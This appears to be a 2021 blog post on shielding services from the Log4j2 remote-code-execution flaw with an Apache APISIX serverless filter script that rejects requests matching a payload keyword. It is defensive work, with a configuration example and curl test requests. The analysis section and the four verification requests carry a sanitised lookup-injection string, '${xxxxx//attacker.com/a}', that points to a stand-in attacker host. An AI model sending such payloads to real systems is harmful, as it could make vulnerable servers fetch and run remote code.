Quickly intercept the high-risk Apache Log4j2 vulnerability using Apache APISIX's serverless capability

Posted by jtymes on Fri, 10 Dec 2021 10:22:37 +0100

Recently, a remote code execution vulnerability in Apache Log4j2 was disclosed on the network. The details became public before the Apache Log4j2 development team had fully fixed it, so every project running Log4j2 versions 2.x up to and including 2.14.1 is at risk of attack.

Vulnerability analysis

From the vulnerability reproduction process we can see that the key step in exploiting it is to construct a malicious payload, similar to

{xxxxx//attacker.com/a}

Until a fully fixed version is officially released and the current environment is upgraded to it, a temporary measure is needed to intercept requests carrying the malicious payload, so that services are protected from exploitation of this vulnerability.

Apache APISIX countermeasures

We can filter the request payload on Apache APISIX: match the keyword of the malicious payload with a regular expression and reject the request.

Assuming the payload keyword is "xxxxx", you can use the serverless plugin to execute a custom interception script. An example configuration is as follows:

curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
    "uri": "/*",
    "plugins":{
        "serverless-pre-function":{
            "phase":"rewrite",
            "functions":[
                "return function(conf, ctx) local core = require(\"apisix.core\"); local function hit(s) return s and ngx.re.match(s, \"xxxxx\", \"jo\") end; local body = core.request.get_body(); local args = core.request.get_uri_args(ctx); local args_json = args and core.json.encode(args, true) or nil; if hit(body) or hit(args_json) then return ngx.exit(403) end; end"
            ]
        }
    },
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "127.0.0.1:1980": 1
        }
    }
}'

Note: the serverless-pre-function block in the configuration above is the user-defined script; the other fields (uri, upstream) are ordinary Apache APISIX route configuration, so adjust them to your environment. Because the route matches "/*", the check runs on every request proxied through this route, in the rewrite phase, before the request is forwarded upstream. The script guards against a missing body or missing query arguments (ngx.re.match raises an error when given nil), checks both the body and the query string rather than only one of them, and rejects a match with ngx.exit(403).

The script in the functions field above does the following:

  1. Extract the request payload: the query-string arguments (URL parameters of a GET request) and the request body (POST/PUT requests)
  2. Match the payload against the regular expression for the malicious keyword
  3. Reject requests carrying the malicious payload with HTTP 403

The script illustrates the approach for handling such requests: capture a characteristic string of the attack, such as the jndi keyword, and reject the request. You can refine the pattern to suit your own needs. Two limitations are worth knowing before relying on it: the script only looks at the query string and the body, so request headers are not inspected, and the body is matched as raw bytes, so a URL-encoded or otherwise obfuscated form of the keyword will not match a plain literal. Treat it as a stopgap until the upstream services are upgraded to a fixed Log4j2 release.

Verification

Intercept a malicious payload in the GET request parameters:

curl -I 'http://127.0.0.1:9080/hello?foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......

Intercept a malicious payload carried in the POST request body (application/json):

curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/json' -X POST -d '
{
  "foo": "${xxxxx//attacker.com/a}"
}'
HTTP/1.1 403 Forbidden
......

Intercept a malicious payload carried in the POST request body (text/plain):

curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: text/plain' -X POST -d '
{xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......

Intercept a malicious payload carried in the POST request body (application/x-www-form-urlencoded; the body is sent without URL-encoding, since the script matches the raw body):

curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d '
foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......

About Apache APISIX

Apache APISIX is a dynamic, real-time, high-performance open source API gateway that provides rich traffic management features such as load balancing, dynamic upstreams, canary releases, circuit breaking, authentication and observability. Apache APISIX helps enterprises handle API and microservice traffic quickly and safely, covering the API gateway, Kubernetes Ingress and service mesh scenarios.

Apache APISIX adopters (partial list)

Topics: log4j serverless apisix